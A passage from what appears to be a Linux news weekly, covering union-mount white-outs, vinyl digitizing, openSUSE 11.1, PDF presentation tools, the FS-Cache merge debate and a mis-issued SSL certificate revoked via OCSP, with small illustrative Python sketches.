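    shutil.copy2(src, dst)
    os.unlink(src)
    return "copied"


def cross_device_rename(src, dst):
    """Stand-in for a rename() that crosses a mount boundary."""
    raise OSError(errno.EXDEV, os.strerror(errno.EXDEV))


with tempfile.TemporaryDirectory() as base:
    src = os.path.join(base, "source.txt")
    dst = os.path.join(base, "destination.txt")
    with open(src, "w") as handle:
        handle.write("payload")

    outcome = move_file(src, dst, rename=cross_device_rename)
    source_gone = not os.path.exists(src)
    with open(dst) as handle:
        moved_content = handle.read()

print(outcome, source_gone, moved_content)
```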

Deletion of files is handled by a special file type called white-outs.
The white-out file type is similar to negative dentries:
they describe a filename which isn't there. This is used to mark a
file in the lower read-only filesystem as deleted, since only the
topmost layer can be modified. However, white-outs would require support
from all the filesystems, to store and recognize such a special
file type. Currently, there is a special type, DT_WHT defined in 
include/linux/fs.h which defines a white-out, but is not in use.
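
A toy model may make the role of white-outs clearer. In this Python sketch the layers are dictionaries and the WHITEOUT marker is an invented sentinel; it says nothing about how a filesystem would actually store a DT_WHT entry on disk.

```python
# Invented marker for a white-out entry; not the kernel's representation.
WHITEOUT = object()


def lookup(stack, name):
    """Scan the layers top to bottom; a white-out hides anything below."""
    for layer in stack:
        if name in layer:
            entry = layer[name]
            return None if entry is WHITEOUT else entry
    return None


def unlink(stack, name):
    """Delete name from the union while modifying only the topmost layer."""
    top, lower = stack[0], stack[1:]
    top.pop(name, None)
    # If a lower, read-only layer still holds the name, mask it.
    if any(name in layer for layer in lower):
        top[name] = WHITEOUT


stack = [{"new_file": "written on top"}, {"old_file": "on read-only media"}]
unlink(stack, "old_file")
unlink(stack, "new_file")

print(lookup(stack, "old_file"), lookup(stack, "new_file"))
```

After the two deletions, both names look up as missing, yet the entry in the lower layer is untouched; only the white-out in the topmost layer hides it.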

Directory namespace unification is a tough task. FreeBSD
implementations gave up after calling it "messy code", and unionfs
entered the -mm tree for a brief period but did not make it to
mainline. Since the unification is pathname-based, it is
best handled in the VFS instead of using a separate
stacked filesystem. The union mount offers a cleaner and more lightweight
approach for merging directories; however, getting it
to adhere to POSIX-compliant directory calls such as telldir() or
seekdir()
is still a challenge and is currently being worked on.

The git repository to track union mounts is located at:

under
the union-dir branch. The union mounts developers intend to release
the patches in a phased manner, starting with the current patch of
root directory level merging. Further developments would see 
patches related to merging at the subdirectory level as well.

		Refining the Process of Digitizing Vinyl Records


In October, your author
discussed
the process of digitizing vinyl records for the creation of a
digital audio library.  Since that time, the process has been
performed on around 40 disks and a number of refinements have been made.
This article discusses what has been learned in that time.


One part of the digitizing process that has proven to work well involved
treating one side of the original media as a single chunk of data.
Many of the processing steps can be performed on these large data chunks
before splitting up the individual tracks.


After making numerous recordings, it was discovered that a single
record level, 93 on the inputs of the M-Audio Delta 44, consistently
produced recordings with a useful volume range on the majority of
the records that were copied.
An interesting phenomenon was observed with some recordings that were
recorded with too much gain.  On loud passages, as the waveform reached
the upper or lower limit (rails in electronic-speak), instead of
just flattening out, a complete inversion of the wave would occur,
resulting in harsh sounding rail-to-rail glitches.
The source of the problem is open to speculation.
If this should occur, it is best to make a new recording of the
album side with a lower input level.


Having two machines handy has helped to optimize the audio processing work.
One machine is dedicated to making the initial album side
recordings.  The sides are minimized in size by removing data
before and after the recorded audio starts, and fade-ins
and fade-outs are added to the whole album side.
The album sides are copied to another machine with a faster processor
for further processing.  The original copy is kept around as a backup
until the side has been fully processed.  After copying the recorded
album side to the secondary machine, a new recording can be started
on the recording machine.


The process of removing clicks and scratches from an album side has seen
the most changes since the original article.  This is a bit of a learned
art. The first step now involves visually inspecting the waveform of the
album side with Audacity.  Often a few huge spikes will be visible
on the recording.  They can be removed by repeatedly selecting an area
and zooming in until the zoom resolution shows individual samples as
dots.  The repair operation should be performed on all of the large
clicks.  Smaller clicks can often be found and removed by zooming into
the quiet passages; an almost infinite amount of hunting, zooming and
repairing can be done.


Another good way to find clicks is to listen, pause, remove and move on.
Most tracks can be cleaned up to a reasonable level without too much
effort.  Some albums can contain an incredible number of clicks while
others can be nearly click-free.
After the manual deglitching is done, the automated click removal
step can be performed.  This is now optional, but it can find additional
clicks that are buried in busy waveforms.


After whatever amount of declicking seems reasonable, the audio is
exported from Audacity as a .wav file.  Before exiting Audacity,
the Stereonorm script
(available here)
is run on the .wav file to bring the left and right channel levels
up to 100% volume.  If the normalization results look reasonable
compared to the Audacity visual representation of the recording,
Audacity is exited and restarted with the normalized recording.
If the normalization numbers do not seem right compared to the visual wave
representation, it is often possible to remove more offending large
clicks, export again and rerun the normalization step.
Although it may make audiophiles cringe, it may be beneficial to
use the repair function to shave the level off on the peaks of
loud percussive waveforms.  Done sparingly, this can be used to
fix balance problems encountered during the normalization step.
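
To see why a single leftover click can spoil the normalization, consider the following Python sketch of independent per-channel peak normalization. It is not the Stereonorm script, whose internals are not described here; the assumption is simply that each channel is scaled so that its largest sample reaches 100%, and the sample values are made up.

```python
def peak(samples):
    """Largest absolute sample value in a channel (0.0 if empty)."""
    return max((abs(s) for s in samples), default=0.0)


def normalize_channel(samples, target=1.0):
    """Scale a channel so that its peak reaches the target level."""
    level = peak(samples)
    if level == 0:
        return list(samples)
    gain = target / level
    return [s * gain for s in samples]


def normalize_stereo(left, right, target=1.0):
    """Normalize each channel on its own, as assumed in this sketch."""
    return normalize_channel(left, target), normalize_channel(right, target)


left = [0.10, -0.25, 0.20]
right = [0.05, 0.10, -0.90]   # -0.90 stands in for a leftover click

norm_left, norm_right = normalize_stereo(left, right)
print(norm_left)
print(norm_right)
```

In this example the left channel is boosted by a factor of four, while the click on the right limits that channel's gain to about 1.1, leaving its music quiet and the stereo balance skewed. Removing the click, or shaving the offending peak, before normalizing avoids that.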


The version of Audacity that your author has been using,
1.3.4-beta on Ubuntu 8.04, has a few bugs that can cause
crashes and the loss of time-consuming work.  Occasionally after doing
a lot of repairs, attempting to export a file as .wav produces a
long stream of zero-length write errors.
It is usually possible to recover from this by writing
out the data in the Audacity native .aup format, exiting and restarting
Audacity with the .aup file, and trying the .wav export again.
On numerous occasions, adding a label track followed by doing more
click repairs has caused Audacity to crash.  It is advisable to
perform the labeling step on a new instantiation of Audacity.
Hopefully these bugs will disappear when the system gets updated
to a newer version of Audacity.


After investing many hours into the creation of a large audio library
(now up to around 200GB), it becomes critical to back up the data.
Fortunately, the price of IDE disks has dropped as fast as the capacity
has risen and hard drives can be treated as high capacity data cartridges.
Backups can easily be done by adding a temporary SATA or USB
drive to a system and running an efficient rsync operation to copy
any new or changed data to the offline archive.
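
One way to script such a backup is sketched below in Python. The directory names are placeholders, and the helper functions are hypothetical; the only rsync options used are -a (archive mode) and --dry-run, which shows what would be copied without copying anything.

```python
import subprocess


def build_rsync_command(library_dir, backup_dir, dry_run=False):
    """Build an rsync command line that copies new or changed files.

    The trailing slash on the source makes rsync copy the directory's
    contents rather than the directory itself.
    """
    command = ["rsync", "-a"]
    if dry_run:
        command.append("--dry-run")
    command += [library_dir.rstrip("/") + "/", backup_dir]
    return command


def run_backup(library_dir, backup_dir, dry_run=False):
    """Run the backup; raises CalledProcessError if rsync fails."""
    return subprocess.run(
        build_rsync_command(library_dir, backup_dir, dry_run), check=True
    )


# Placeholder paths; nothing is executed here, the command is only printed.
example = build_rsync_command("/srv/audio", "/mnt/backup/audio", dry_run=True)
print(" ".join(example))
```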


		openSUSE 11.1 is out


openSUSE 11.1 was released this week.  This
point release contains new features and bug fixes.  A series of sneak peeks looks
at KDE 4.1.3, The Latest GNOME Desktop, Improved Installation, Easier
Administration and more, with plenty of eye candy.

There is a look at the download
numbers as of December 24, 2008 and lots of
coverage.  DistroWatch summed up a lengthy
review with:

My only reservation is to do with proprietary codecs and drivers, which
still needs some work to reach the same level as other distributions.  For
new users, this is still just too hard. I tried to get 3D working with
ATI's proprietary driver and gave up in the end (X worked, but no 3D due to
OpenGL errors). The 'recommended packages' feature of the package manager
is a great idea and does install MP3 support automatically, but this is
still second rate and users expect more. Overall I really feel that this
version of openSUSE provides a complete desktop experience for the
user. What does it have to offer you?  Download it and give it a try, you
might be pleasantly surprised at what you find.


This version of openSUSE comes with a new OpenSUSE License with no EULA.

DaniWeb interviewed
community manager Joe "Zonker" Brockmeier.

What's new in openSUSE 11.1?

Tons. :-)

More specifically, we have a lot of new software -- OpenOffice.org 3.0,
GNOME 2.24, KDE 4.1.3, Banshee 1.4, and a lot more. We've also updated some
important YaST modules (YaST is the system management tool for openSUSE)
including the partitioner, printer module, and security module that allows
users to examine their system's security.

This release also introduces a major new feature called Nomad, which is a
new remote desktop technology. (http://en.opensuse.org/Nomad)

This was also a major update in other ways. First, this is the first
release that was built in the openSUSE Build Service, which is an important
step for allowing more contributions from the community over time. Also, we
introduced a new, more friendly license and we removed some pieces of
software from the DVD media that prevented redistribution, so now openSUSE
is easier to obtain and distribute than ever before.


We asked openSUSE developers to share a little about their views of the
best new features or what they are most excited about.  We will conclude
this article with their responses.

Greg Kroah-Hartman:

The new kernel version update, to the 2.6.27 release series, provides
support for many new devices and platforms over the previous openSUSE
releases.


Aaron Bockover:

I am excited about Mono 2.0 in openSUSE 11.1 as it brings a number of major
performance, memory, and stability improvements to our applications. From
the developer point of view, Mono is more compelling than ever with full C#
3.0 support. openSUSE is hands-down the best distribution for developing on
Mono.


Michael Meeks: 

My favourite OpenOffice.org feature, and a world-first, is the split
build; this allows you to quickly compile just 'writer' against your
installed libraries (finally, like all other applications); so you can
get involved with OO.o much more easily.

My second favourite is the console help when invoking a missing tools,
telling you the command to install it and the respective package -
that combined with the speedy zypper makes life exceeding smooth.


Hans Petter Jansson:

I think one of my favorite 11.1 features must be that user switching
(switching to another logged-in user's desktop without logging out)
finally works seamlessly with GDM.


Joe 'Zonker' Brockmeier:

Of all the features and updates in this release, there are two things
that really make the release for me. One is the KDE 4 desktop, which
has come a very long way. It has a lot of polish and I'm really
impressed with the improvements since 11.0. The other is the new
license, which makes openSUSE much easier to redistribute and gets rid
of the EULA that openSUSE used to have.


		PDF-based presentations with 3-D effects


At first, the idea of adding 3-D transitions to command line presentation
software may give you a kind of cognitive dissonance. Just as you would if
someone had added a GPS tracking system to a one-horse cart plodding along
at two kilometers an hour, you have to wonder why anyone would bother. But,
the dissonance disappears as you start to explore the control and precision
you have in command-line programs like PDFCube and Impressive (formerly
KeyJNote). Both are small and efficient programs that allow you to add
transitions and other special effects to PDF-based presentations, although
the range of options varies considerably between the two programs. 


Before using either PDFCube or Impressive, you need to have support
for 3-D graphics installed. PDFCube works well with OpenGL, as well as with
the drivers and video cards listed on its hardware
compatibility page. By contrast, Impressive is somewhat more erratic
under OpenGL, with some transitions displaying slowly, especially when you
have less than two gigabytes of RAM available. However, by picking and
choosing effects, you can still test drive Impressive without resorting to
proprietary drivers. 


Both applications are available as source code from their project
sites. However, you will also need to install dependencies for PDF support,
such as Poppler for PDFCube, and Xpdf Reader or Ghostscript for
Impressive. Impressive also requires Perl and Python. For convenience, you
may prefer to use the Debian packages for both programs, or, in the case of
PDFCube, the packages available in the Fedora and Ubuntu
repositories. Impressive is also available for OS X and Windows. 

PDFCube


With version 0.0.3 just released, PDFCube is more a proof of concept than a
finished application. In fact, it currently has only one transition effect
— a spinning cube. However, a day after the latest release, maintainer
Mirko Maischberger posted a brief announcement on the project
home page saying that he has already started work on "an abstraction layer for 3D
effects (cube, fading, cover flow) to be done in C++ and OpenGL)." 


What you currently have in PDFCube is the basic engine. No options are
available, so all you need to type to try PDFCube is pdfcube
filename.pdf. 


However, before trying PDFCube, take the time to read its man page to learn
how to navigate within the program. Unlike full office applications like
OpenOffice.org Impress or KPresenter, PDFCube is driven completely by
keyboard commands, and — so far, at least — does not work with
the mouse 
at all. 


Fortunately, the basic commands are few. You press the 'c' or space key to
move to the next page of a presentation using an effect, or the PageUp key
to move to the next page without any effect or the PageDown key to move to
the previous page without effect. You can also use the 'h','j','k', and 'l' keys to
zero in on one of the corners of the current page, or the 'z' key to zoom in
on the center. Pressing any of these keys zooms out again, while Esc stops
the presentation. These are all the controls that you are likely to need. 


As Maischberger suggests on the project home site, the spinning cube is
easy to overdo, so you might want to limit its use to major
transitions. You can impose this limit by adding the page numbers
before the places you want the transition. For instance, if you
entered pdfcube filename.pdf 0 3, you would have the
spinning cube between pages 1 and 2 and pages 4 and 5 only. Other
transitions would lack the effect. 
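
The numbering in that example suggests that the arguments are zero-based page indices, each naming the page that the cube spins away from. The Python sketch below encodes that reading, which is inferred from the example above rather than taken from the PDFCube documentation; the helper names are invented.

```python
def cube_transitions(indices):
    """Translate zero-based arguments into (from_page, to_page) pairs,
    counting pages from 1 as a reader would."""
    return [(index + 1, index + 2) for index in indices]


def pdfcube_command(pdf_path, indices):
    """Build the command line for the given file and transition points."""
    return ["pdfcube", pdf_path] + [str(index) for index in indices]


print(" ".join(pdfcube_command("filename.pdf", [0, 3])))
print(cube_transitions([0, 3]))
```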


Another point to be aware of with PDFCube is that it is designed for landscape
oriented pages. You can display PDF files with a portrait orientation, but
the application currently gives you no way of scrolling up or down the
page. But, this limit aside, PDFCube shows a simplicity and performance
that you don't often see in its desktop equivalents. 

Impressive

At version 0.10.2, Impressive is already much more complete than
PDFCube. It not only runs slideshows from directories with BMP, JPEG, PNG,
and TIFF graphics as well as from PDFs, but also includes a complete set of
controls for fine-tuning how its presentations run — to say nothing of
several unique controls for running a presentation. 


You can view a complete list of options with impressive
--help, or from the project documentation
page. They include options to set up an automatic slideshow, complete with
a loop from the end back to the beginning, to set the size of the
presentation window, and just about every other aspect of the running and
appearance of a presentation that you can imagine. Two especially
noteworthy options are -d, which allows you to set a time for
the entire presentation, then pace yourself by an unobtrusive bar along the
bottom of the screen, and -u, which polls original files
periodically to see if they are updated. 


If you want to use slide transitions, you will need to enter
impressive --listtrans to see a list of over 20 possible
transitions. All the transitions have names like SlideUp or WipeDownRight
that are clear enough to be self-explanatory, although the help screen does
include a slightly longer description. You can use a transition by adding
its name with the -t  option. However, unlike PDFCube,
Impressive currently limits you to a single transition for the entire slide
show — a limitation that might frustrate some users, but also prevents the
aesthetic disaster of anyone using too many. 


In addition, Impressive includes several handy controls. Pressing the Tab
key opens a view of all the slides in the presentation, while pressing the
Enter key enables a spotlight that follows the mouse and can be used as a
built-in pointer.  


Still another option is to draw an enclosed shape with the mouse, which
results in the rest of the screen darkening and blurring, so that the
audience's attention is focused on the area you defined. You can add
multiple highlighted areas, each of which you can close with a right
mouse-click. The screen returns to normal when you close the last
highlighted area. 


Impressive's view of all slides is reminiscent of the slide view in many
programs, or the Sun Presenter Console for OpenOffice.org, but its
highlight boxes and spotlight are both features that I haven't seen in
desktop-oriented programs. These features alone make Impressive worth a
look, but more experienced users might also appreciate the wealth of
available options — even if they don't often use many of them. 

Conclusion

Both PDFCube and Impressive are works in progress, with some ways — and,
at the current rate of development, perhaps some years — to go before
their 1.0 releases. However, in the current versions, PDFCube has the
superior basic engine, while Impressive allows users the greater
control. Despite PDFCube's lack of options and Impressive's mediocre OpenGL
support, both are worth keeping at least an occasional eye on. 

 
In their separate ways, both demonstrate that, contrary to what many
desktop users seem to assume, command line applications are not just
archaic remnants. You need time to enter all the options in a command line
application, but, if you take the trouble to familiarize yourself with the
applications, you may find their controls easier to use than the cluttered
editing windows of a desktop application like OpenOffice.org Impress. Far
from being outdated, applications like PDFCube and Impressive are practical
demonstrations that command line applications can be both modern and
innovative. 


		Justifying FS-Cache


In what must seem like a never-ending effort, David Howells is once again
trying to get a generic mechanism to do local caching for network
filesystems into the kernel.  The latest version, number 41, of his FS-Cache patches was posted back
in November, so now he is asking
for it to be added to linux-next.  That would mean that the feature was
on-track for the mainline in 2.6.29, but it would appear that
2.6.30—if ever—is more likely.


The idea behind FS-Cache is to create a way for "slow"
filesystems to cache their data on the local disk, so that repeated
accesses do not require accessing the underlying slow storage.  Howells has been
working on getting it into the kernel for a number of years; our first article about it appeared
in 2004.  The canonical example of where it might be useful is a
network filesystem on a heavily-used or low bandwidth link—the cost
of re-reading data from the network may be much higher than retrieving it
from a local disk.  In addition, the cache can be persistent across
reboots, allowing some files to live locally for a very long time.
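
The general idea, though not FS-Cache's actual design, can be shown with a small read-through cache in Python. Everything here is an assumption made for illustration: the class name, the use of a hashed file name as the cache key, and the fetch callback standing in for the slow network read. Coherency with the server, which any real cache must handle, is ignored entirely.

```python
import hashlib
import os
import tempfile


class ReadThroughCache:
    """Keep copies of slow-to-fetch data in a directory on the local disk."""

    def __init__(self, cache_dir, fetch):
        self.cache_dir = cache_dir
        self.fetch = fetch            # callable doing the slow remote read
        os.makedirs(cache_dir, exist_ok=True)

    def _cache_path(self, remote_path):
        digest = hashlib.sha256(remote_path.encode("utf-8")).hexdigest()
        return os.path.join(self.cache_dir, digest)

    def read(self, remote_path):
        local = self._cache_path(remote_path)
        if os.path.exists(local):
            # Cache hit: serve the data from the local disk.
            with open(local, "rb") as handle:
                return handle.read()
        # Cache miss: go to the slow storage and keep a local copy.
        data = self.fetch(remote_path)
        with open(local, "wb") as handle:
            handle.write(data)
        return data


fetch_calls = []


def slow_fetch(remote_path):
    """Stand-in for a read over a slow network link."""
    fetch_calls.append(remote_path)
    return b"contents of " + remote_path.encode("utf-8")


with tempfile.TemporaryDirectory() as cache_dir:
    cache = ReadThroughCache(cache_dir, slow_fetch)
    first = cache.read("/export/data.bin")
    second = cache.read("/export/data.bin")
    # A new object reusing the directory models persistence across a reboot.
    after_restart = ReadThroughCache(cache_dir, slow_fetch).read("/export/data.bin")

print(len(fetch_calls))
```

Only the first read reaches the slow backend; the repeat read and the read after the simulated restart are both served from the local directory.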


But Howells already has a fairly large, intrusive patch that is headed for
2.6.29: 
credentials.  That patch
touches a lot of code in the kernel, in particular the VFS layer. Christoph
Hellwig is 
concerned about both credentials and FS-Cache
going in at the same time:

I don't think we want fscache for .29 yet.  I'd rather let the
credential code settle for one release, and have more time for actually
reviewing it properly and have it 100% ready for .30.


While that would delay the addition of FS-Cache, Andrew Morton has a larger concern:

I don't believe that it has yet been convincingly demonstrated that we
want to merge it at all.

It's a huuuuuuuuge lump of new code, so it really needs to provide
decent value.  Can we revisit this?  Yet again?  What do we get from
all this?


Morton is worried about adding additional maintenance headaches with
no—or limited—benefits.  Using a local disk to cache data from
a remote disk is only useful in some scenarios; it can certainly make
things worse in others.  As Howells puts
it: "It's a compromise: a trade-off between the loading and
latencies of your 
network vs the loading and latencies of your disk; you sacrifice disk space to
make up for the deficiencies of your network."  What Morton is
looking for is a push from users, be that
end users or distributions that 
are shipping the feature.  He would also like to see some benchmarks that
show what gain there is when using FS-Cache.
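
The trade-off Howells describes can be put into a back-of-the-envelope
model.  The sketch below is an assumption-laden simplification, not
anything taken from the FS-Cache patches: it treats every read as costing
a single fixed time, and the function and parameter names are invented for
illustration.

```python
def expected_read_time(hit_rate, net_time, disk_time, fill_time=0.0):
    """Average time per read with a local cache in front of the network.

    hit_rate  -- fraction of reads served from the local cache (0.0 to 1.0)
    net_time  -- time to satisfy one read over the network
    disk_time -- time to satisfy one read from the local cache
    fill_time -- extra time spent writing a missed read into the cache
    """
    if not 0.0 <= hit_rate <= 1.0:
        raise ValueError("hit_rate must be between 0 and 1")
    miss_rate = 1.0 - hit_rate
    # Hits pay the disk cost; misses pay the network cost plus the fill.
    return hit_rate * disk_time + miss_rate * (net_time + fill_time)


def cache_helps(hit_rate, net_time, disk_time, fill_time=0.0):
    """True when the cached average beats going to the network every time."""
    cached = expected_read_time(hit_rate, net_time, disk_time, fill_time)
    return cached < net_time
```

With made-up numbers, a network read that costs ten times as much as a
disk read makes the cache a clear win at a 50% hit rate, while a network
that is as fast as the local disk makes it a loss, since every miss still
pays for filling the cache.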


Howells has patiently answered these concerns, pointing at some benchmarks he had posted in
November that showed some significant savings.  The benchmarks used NFS
over a deliberately slow link (to simulate a heavily used network) and
showed a huge decrease in the time required to read a large file, but were
essentially break-even when operating on a kernel tree.  In the kernel tree
benchmark, though, the reduction in network traffic was significant.


More important, perhaps, is the fact that Red Hat has shipped FS-Cache in
RHEL 5 and that there are customers using it, as well as customers
interested in using it, as Howells pointed out:

We (Red Hat) have shipped it in RHEL-5 and some Fedora releases.  Doing so is
quite an effort, though, precisely because the code is not yet upstream.  We
have customers using it and are gaining more customers who want it.  There
even appear to be CentOS users using it (or at least complaining when it
breaks).


While shipping out-of-tree code is no guarantee that the feature will get
merged—AppArmor is an excellent counterexample—actual users
whose needs are being met by a particular feature are a fairly
persuasive argument.  Howells outlines some
customer use cases for FS-Cache, for example:

We have a number of customers in the entertainment industry who use or
would like to use this caching infrastructure in their render farms.  They
use NFS to distribute textures (say a million and a quarter files) to the
individual rendering units.  FS-Cache allows them to reduce the network
load by satisfying subsequent NFS READ requests from each rendering unit's
local cache rather than having to go to the network again.


In all, it would seem that Morton's concerns were addressed.  Whether that
means the path is clear for 2.6.30, or whether these or other concerns
will come to the fore again, is a question that will likely have to wait
another three months or so.


		SSL man-in-the-middle attacks


A while back, we looked at the
new Firefox 3 warnings for self-signed and expired SSL certificates.
As annoying as some found those to be, they certainly increased the
visibility of "invalid" certificates.  Those certificates could lead to
man-in-the-middle attacks, which is what led Mozilla to issue such
eye-opening warnings.  More recently, Eddy Nigg of Startcom—issuer of
free SSL certificates—found another way to do man-in-the-middle 
attacks without setting off any of the new warnings.


What Nigg found was that he could get a perfectly valid certificate for a
domain he did not control: in this case mozilla.com.  He could
then masquerade as the secure Mozilla site with impunity; any browsers that
landed there would verify the certificate as belonging to mozilla.com.
He did it through a Comodo reseller with no questions asked: "Five
minutes later I was in the possession of a legitimate certificate issued
to mozilla.com – no questions asked – no verification checks done – no
control validation – no subscriber agreement presented, nothing."


That is clearly a bug in the verification process, but it is completely out
of the control of the browser.  The browser must trust some set of key
signing authorities (i.e. Certificate Authorities or CAs), but has no way
to control how well or poorly they vet the keys that they, or their
downstream resellers, sign.  We saw the same potential problem in a
slightly different guise with
"Extended Validation" certificates back in
2006.  It all comes down to trusting CAs.


Sometime after Nigg's story hit Slashdot, Comodo revoked the certificate,
which did cause Firefox to put up an error and disallow the
connection.  One wonders how many bad certificates have been issued but not
revoked because a phisher or other scammer received them.  One would think
those folks would be less likely to publicly announce what they had done.


Bringing attention to the problem will likely help, but there are just
too many ways to create bad SSL certificates for those that really want
them—bribing CA employees 
if nothing else.  Another useful outcome is that
Richard Bejtlich got interested in just how the revocation process works.
He collected packet data from accessing Nigg's certificate after it had
been revoked, which gives a look inside the Online Certificate Status
Protocol (OCSP).


OCSP is designed to do just what it did: cause a bad certificate to fail
when verified by the browser.  Nigg's certificate listed an OCSP server that
should be consulted.  Because that information has been signed by the CA,
it can't be tampered with.  So long as the browser makes the OCSP check,
certificates can be revoked in this manner—as long as the CA is aware
that revocation is needed.
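
The sequence of checks described above can be modeled in a few lines.  This
is a toy, not an OCSP client: nothing here is signed or sent over the
network, and the class names, the "Example CA" issuer, and the
ocsp.ca.example responder are all invented for illustration.  It only
shows the order of the checks and why a validly issued certificate keeps
working until the CA marks it as revoked.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Certificate:
    serial: int
    subject: str        # domain the certificate claims to cover
    issuer: str         # name of the CA that signed it
    ocsp_server: str    # responder named inside the signed certificate


@dataclass
class ToyResponder:
    """Stand-in for a CA's OCSP responder: tracks revoked serial numbers."""
    revoked: set = field(default_factory=set)

    def status(self, serial):
        return "revoked" if serial in self.revoked else "good"


def browser_accepts(cert, hostname, trusted_cas, responders):
    # Step 1: the issuer must be a CA the browser already trusts.
    if cert.issuer not in trusted_cas:
        return False
    # Step 2: the certificate must name the site being visited.
    if cert.subject != hostname:
        return False
    # Step 3: ask the responder listed in the certificate for its status.
    return responders[cert.ocsp_server].status(cert.serial) == "good"


def demo():
    responder = ToyResponder()
    responders = {"ocsp.ca.example": responder}
    cert = Certificate(1001, "mozilla.com", "Example CA", "ocsp.ca.example")
    before = browser_accepts(cert, "mozilla.com", {"Example CA"}, responders)
    responder.revoked.add(cert.serial)   # the CA learns of the problem
    after = browser_accepts(cert, "mozilla.com", {"Example CA"}, responders)
    return before, after
```

In demo(), the same certificate is accepted before the revocation and
rejected afterward; nothing about the certificate itself has changed, only
the answer from the responder it points to.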


Public key cryptography—the basis of SSL and many other encryption
schemes—is an amazing method for doing encryption, but 
it does suffer from a major shortcoming: key exchange.  For relatively
simple situations, where both parties know each other and have a way to
securely exchange keys, it works well.  When trying to handle
other kinds of communications, either a "web of trust" (a la PGP and
GPG) or some kind of trusted authority is required.  When those break down,
man-in-the-middle and other scams are possible.